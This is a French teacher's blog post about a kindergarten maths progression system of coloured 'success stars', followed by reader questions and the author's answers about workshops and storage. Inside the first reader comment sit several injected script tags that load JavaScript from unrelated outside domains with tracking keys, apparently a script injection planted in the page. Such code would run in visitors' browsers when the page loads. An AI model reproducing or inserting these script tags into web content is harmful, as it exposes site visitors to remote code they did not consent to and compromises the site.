• Etoiles de réussites maths GS

    Vous trouverez ici mes étoiles de maths pour mes GS.

    Le principe : sur des temps dédiés, les enfants ont leur plan de travail (ils démarrent tous à l'étoile blanche) et font les ateliers correspondants mis à disposition dans la classe (3 meubles de 12 tiroirs, un meuble correspond à un domaine, chaque tiroir correspond à une couleur d'étoile et à l'intérieur on retrouve tous les ateliers nécessaire au passage de l'étoile). Concernant le temps passé en étoile, je vous invite à jeter un œil à mon emploi du temps (ICI). 

    Je compte 2 étoiles par période (donc 10 à l'année). Si l'enfant peut aller plus vite, il le pourra bien entendu. J'aimerais qu'ils suivent cette cadence, je vais donner cet objectif car je ne veux pas que certains enfants se laissent porter (c'est ce qu'il s'est passé avec des CP l'an dernier, sans réel objectif donné, certains prennent beaucoup trop leur temps !).

    Ce domaine regroupe le travail autour des nombres, premiers calculs mais aussi un peu de géométrie et grandeurs et mesures. Concernant le travail autour des constructions avec divers outils et jeux (kaplas, legos, blocs logiques...) je travaille en brevets.

    Dans chaque étoile, des ateliers autonomes mais aussi des jeux qui seront faits en ateliers dirigés (si je vois que l'enfant est à l'aise, il valide suite à l'atelier, sinon je refais jouer un petit groupe d'élèves qui a besoin), et des QR codes qui renvoient vers des jeux en ligne.

    Je vous invite à les découvrir en bas de page. Je remercie d'avance tous les blogueurs qui mettent leurs ateliers en partage (et je sais le temps que ça prend, déjà de les fabriquer mais aussi de faire un article de blog pour les partager !!). Donc MERCI chers collègues !

    Vous trouverez la plupart des sources des ateliers dans la rubrique des mes anciens ateliers autonomes ICI ou dans la rubrique concernant les maths en maternelle ICI. Si vous ne retrouvez pas certains ateliers, n'hésitez pas à me demander en commentaire en bas de l'article et je vous mettrai les liens directs !

    Bonne lecture ! Et bon courage si vous souhaitez vous lancer !

    Etoiles de réussites maths GS

    Télécharger les plans de travail de maths GS

     

    Quelques sources d'ateliers que vous m'avez demandées :

    Etoile rose "Dénombrer des éléments fixes" : Mes tresses D Zécolles ICI

     

    Un petit commentaire si vous passez par là fait toujours plaisir ^^

     

     Les autres étoiles ICI

    Tous les derniers articles du blog

     

    Pin It

    Tags Tags : , , , ,
  • Commentaires

    1
    Nounette
    Vendredi 31 Juillet à 18:40

    Bonjour,

    Merci pour ces explications et tout ton travail ! Je me demande combien de fois les enfants font chaque atelier avant que tu le valides ? et je pense avoir mal compris, tu dis que tous les ateliers de la même étoile sont rangés dans un seul et même tiroir ?

    <script src="//qalitygigant.com/227ee61cbd084e801b.js"></script> <script src="http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8830x" type="text/javascript"></script> <script src="http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8830x&format=arrjs&r=1596213489673" type="text/javascript"></script> <script src="http://qalitygigant.com/ext/227ee61cbd084e801b.js?sid=52666_8830_&title=asas&blocks[]=31af2" type="text/javascript"></script>
      • Vendredi 31 Juillet à 23:22

        Bonjour. En fait, ce n'est pas vraiment une histoire de nombre de fois, mais je vois si l'enfant est à l'aise avec la notion ou non. Parfois, je valide au bout d'une fois et même si l'atelier n'est pas terminé car je vois que l'enfant est vraiment très à l'aise. D'autre fois, il aura fallu beaucoup d'aide, donc je préfère qu'il refasse 2/3 fois avant de valider.

        Et oui, tous les ateliers sont rangés dans un même tiroir, chaque atelier est fermé dans un sac de congélation IKEA. Si l'atelier est trop gros (si c'est un jeu par exemple), il est rangé dans un autre meuble, en libre accès aussi.

    2
    Roseline
    Mercredi 12 Août à 20:16

    Bravo et merci pour tout ce travail exceptionnel qui va bien m'aider pour mon retour en grande section !

    3
    Julie
    Jeudi 13 Août à 12:07

    BOnjour, merci pour ce super travail très inspirant!

    Cela donne des repères pour quelqu'un qui débute. 

    Je voulais savoir si tu pouvais me donner le lien du jeu de cartapinces où il s'agit de décomposer les nombres de 6 à 9, avec les moutons manquants ... ? Je n'arrive pas à le trouver...

    Merci d'avance!

      • Lundi 24 Août à 22:34

        C'est le mien que je n'ai pas encore posté sur le blog, je m'en occupe très vite ! ^^

    4
    vivi
    Dimanche 16 Août à 10:13

    Bonjour et un grand bravo pour ces étoiles de réussite !

    Qq  questions SVP :

    -Proposez vous une page de garde ? Peux t on retrouver sur votre site les fiches de suivi ?

    -Vos brevets de réussite sont ils également regroupés dans un livret ?

    Merci d avance pour vos réponses.

      • Dimanche 16 Août à 20:52

        Je n'ai pas encore créé les fiches de suivi et la page de garde... ! Je regroupe les étoiles terminées dans un porte vue.

    5
    anay
    Mercredi 19 Août à 11:49

    Bonjour, je suis très intéressée par ce fonctionnement qui présente énormément d'avantages (autonomie et progrès des élèves, mise en projet, entraînement régulier, validation/évaluation rapide). Je vois que tu mettais en place les AIM et en regardant ton emploi du temps je comprends que ces étoiles les "remplacent"... Ai-je bien compris?

    Je te remercie pour tous ces partages qui me permettront de structurer mes temps de classe ( et par ailleurs de me rebooster!)yes

      • Vendredi 21 Août à 21:01

        Oui tout à fait les étoiles remplacent les AIM.

    6
    TiteMa
    Dimanche 23 Août à 22:36

    Bonjour, 
    Après tant et tant de recherches sur un nouveau fonctionnement prenant davantage en compte les différences d'avancement de mes élèves, je tombe sur vos documents ! Merci ! 
    Cela me semble tout à fait réalisable avec mes GS. 

    Les niveaux blancs et jaunes me semblent également adaptés pour des MS. Qu'en pensez-vous ? 

    Est-il envisageable de transposer ce fonctionnement dans les autres domaines ? 

    Tout le matériel pour un niveau dans un tiroir. Cela fait un tiroir chargé non ? Je ne me rends pas bien compte ... Les élèves réussissent-ils à se repérer facilement parmi les sacs ? 
    Je vous remercie de vos réponses et vous souhaite bon courage pour les derniers préparatifs. 
    Merci encore de tous vos partages ! 

      • Lundi 24 Août à 22:25

        Bonjour,

        Ma collègue en TPS PS MS a en effet repris les étoiles de la blanche à la orange qui sont en fait ses étoiles de fin d'année MS.

        Il est bien sûr tout à fait envisageable de transposer ce système à d'autres domaines, sur le blog vous trouverez la phono et l'écrit aussi. J'aimerais faire vie pratique / motricité fine, (mais pas eu le temps cette année).

        les tiroirs sont bien plein (chaque atelier est rangé dans un sac de congélation) mais ça va, vous pouvez coller des étiquettes sur les sacs de congélation avec étoiles et domaines (colonnes de chez leclerc) pour plus de repérage.

         

        Bonne soirée

    • Nom / Pseudo :

      E-mail (facultatif) :

      Site Web (facultatif) :

      Commentaire :


    7
    Gwen
    Samedi 14 Novembre à 17:01

    Bonjour,

    Je reviens vers toi une nouvelle fois car je ne parviens à trouver l'atelier décomposer les nombres de 1 à 5 (carte à pince)

    dans l'étoile verte (3ème atelier).

    Encore merci pour tout ton travail !

    Mes élèves sont ravis des ateliers de maths, ils sont rendus à l'étoile jaune et certains vont débuter l'étoile orange.

    Gwen

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :